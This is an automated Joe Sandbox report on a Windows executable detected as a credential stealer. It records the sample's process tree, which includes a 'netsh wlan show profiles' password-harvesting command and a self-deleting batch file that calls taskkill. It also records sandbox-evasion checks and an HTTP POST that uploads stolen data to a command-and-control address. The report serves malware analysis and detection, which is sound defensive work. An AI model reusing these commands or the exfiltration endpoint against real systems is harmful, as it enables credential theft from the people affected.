Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T05Dk6G8fg.exe

Overview

General Information

Sample name:T05Dk6G8fg.exe
Analysis ID:1568332
MD5:c0eecac6ebad33e8ec152dbcaf47f7d7
SHA1:803a5e67b91856ca6b5ef732bbaf0b7b089f96e7
SHA256:31dc0b83d8a5e8f366d31a111c8759d6bb736bc34bbff372db151b9df52b3b0f
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SIDT)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • T05Dk6G8fg.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\T05Dk6G8fg.exe" MD5: C0EECAC6EBAD33E8EC152DBCAF47F7D7)
    • cmd.exe (PID: 7188 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8248 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 8280 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 8352 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 8368 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 8376 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 9104 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 9160 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 9196 cmdline: TaskKill /F /IM 2956 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8268 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 8416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 2948 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: T05Dk6G8fg.exe PID: 2956JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    Stealing of Sensitive Information

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T05Dk6G8fg.exe", ParentImage: C:\Users\user\Desktop\T05Dk6G8fg.exe, ParentProcessId: 2956, ParentProcessName: T05Dk6G8fg.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 8280, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T15:07:30.653743+010020283713Unknown Traffic192.168.11.304938123.50.114.44443TCP
    2024-12-04T15:08:34.171333+010020283713Unknown Traffic192.168.11.304938723.50.114.44443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T15:07:37.645453+010028438561A Network Trojan was detected192.168.11.304938289.23.100.2331488TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: T05Dk6G8fg.exeAvira: detected
    Source: T05Dk6G8fg.exeReversingLabs: Detection: 55%
    Source: T05Dk6G8fg.exeJoe Sandbox ML: detected
    Source: T05Dk6G8fg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: System.Windows.Forms.pdbL source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.ni.pdb source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.pdb\ source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.ni.pdb source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.pdbi source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Security.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.IO.Compression.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.ni.pdbRSDS source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.pdbTL source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.ni.pdbRSDSX source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.pdb source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: mscorlib.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: mscorlib.ni.pdbRSDSrMV9 source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.pdb source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: mscorlib.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.pdbH source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.ni.pdbRSDS6 source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.30:49382 -> 89.23.100.233:1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49382
    Source: global trafficTCP traffic: 192.168.11.30:49382 -> 89.23.100.233:1488
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="65402622-80d8-4158-9f0b-d6844d3bfea0"Host: 89.23.100.233:1488Content-Length: 135206Expect: 100-continueConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
    Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
    Source: unknownDNS query: name: icanhazip.com
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49381 -> 23.50.114.44:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49387 -> 23.50.114.44:443
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: icanhazip.com
    Source: global trafficDNS traffic detected: DNS query: 15.55.7.0.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="65402622-80d8-4158-9f0b-d6844d3bfea0"Host: 89.23.100.233:1488Content-Length: 135206Expect: 100-continueConnection: Keep-Alive
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1488
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1488/uploadt
    Source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.0000000070E90000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://gemini.google.com/app?q=
    Source: T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: tmpD36E.tmp.dat.1.drString found in binary or memory: https://www.google.com/favicon.ico
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

    System Summary

    barindex
    Source: T05Dk6G8fg.exeStatic PE information: section name: .{oA
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4AA0 NtOpenFile,1_2_02EB4AA0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4B78 NtCreateSection,1_2_02EB4B78
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB41C8 NtClose,1_2_02EB41C8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4ED8 NtDeviceIoControlFile,1_2_02EB4ED8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4680 NtProtectVirtualMemory,1_2_02EB4680
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4E10 NtQueryVolumeInformationFile,1_2_02EB4E10
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4758 NtAllocateVirtualMemory,1_2_02EB4758
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4D20 NtMapViewOfSection,1_2_02EB4D20
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4A98 NtOpenFile,1_2_02EB4A98
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4B70 NtCreateSection,1_2_02EB4B70
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB41C1 NtClose,1_2_02EB41C1
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4ED1 NtDeviceIoControlFile,1_2_02EB4ED1
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4678 NtProtectVirtualMemory,1_2_02EB4678
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4E08 NtQueryVolumeInformationFile,1_2_02EB4E08
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4751 NtAllocateVirtualMemory,1_2_02EB4751
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4D18 NtMapViewOfSection,1_2_02EB4D18
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4ED8: NtDeviceIoControlFile,1_2_02EB4ED8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152A1501_2_0152A150
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152D9701_2_0152D970
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015298481_2_01529848
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015210981_2_01521098
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152C0981_2_0152C098
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01528BA81_2_01528BA8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01528C981_2_01528C98
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152BE981_2_0152BE98
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015298461_2_01529846
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152A0001_2_0152A000
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015210961_2_01521096
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01528B501_2_01528B50
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152BB291_2_0152BB29
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01528B981_2_01528B98
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01529D7A1_2_01529D7A
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01529D991_2_01529D99
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01529D9E1_2_01529D9E
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01529DA01_2_01529DA0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01520B701_2_01520B70
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015294D81_2_015294D8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_015294C71_2_015294C7
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01528C881_2_01528C88
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_01529FF01_2_01529FF0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0152BE891_2_0152BE89
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB3AE01_2_02EB3AE0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB63801_2_02EB6380
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB8B581_2_02EB8B58
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB39A01_2_02EB39A0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB0ED01_2_02EB0ED0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB36981_2_02EB3698
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBD7501_2_02EBD750
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBDF001_2_02EBDF00
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB24C01_2_02EB24C0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBCD201_2_02EBCD20
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB72401_2_02EB7240
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBDF001_2_02EBDF00
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB13601_2_02EB1360
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB20C01_2_02EB20C0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB39701_2_02EB3970
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB81201_2_02EB8120
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB81111_2_02EB8111
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB0EC11_2_02EB0EC1
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EB4FB01_2_02EB4FB0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBCC881_2_02EBCC88
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_02EBCD101_2_02EBCD10
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDE6C81_2_06CDE6C8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD96581_2_06CD9658
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD47C81_2_06CD47C8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD2F8A1_2_06CD2F8A
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDDCF01_2_06CDDCF0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD54BA1_2_06CD54BA
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDEC701_2_06CDEC70
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD25401_2_06CD2540
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD9AC01_2_06CD9AC0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD3B981_2_06CD3B98
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDCB271_2_06CDCB27
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDC8E01_2_06CDC8E0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD60A01_2_06CD60A0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD00401_2_06CD0040
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDE6851_2_06CDE685
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDD7C51_2_06CDD7C5
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDD7901_2_06CDD790
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD0CE31_2_06CD0CE3
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD95D81_2_06CD95D8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD25321_2_06CD2532
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDE2ED1_2_06CDE2ED
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDE3CF1_2_06CDE3CF
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDA39A1_2_06CDA39A
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDE3AF1_2_06CDE3AF
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD43B01_2_06CD43B0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD0B771_2_06CD0B77
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CDC8D11_2_06CDC8D1
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD38281_2_06CD3828
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_06CD51701_2_06CD5170
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081828181_2_08182818
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08185C001_2_08185C00
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08186E001_2_08186E00
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08187E381_2_08187E38
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081800401_2_08180040
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081860791_2_08186079
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0818DA651_2_0818DA65
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081866801_2_08186680
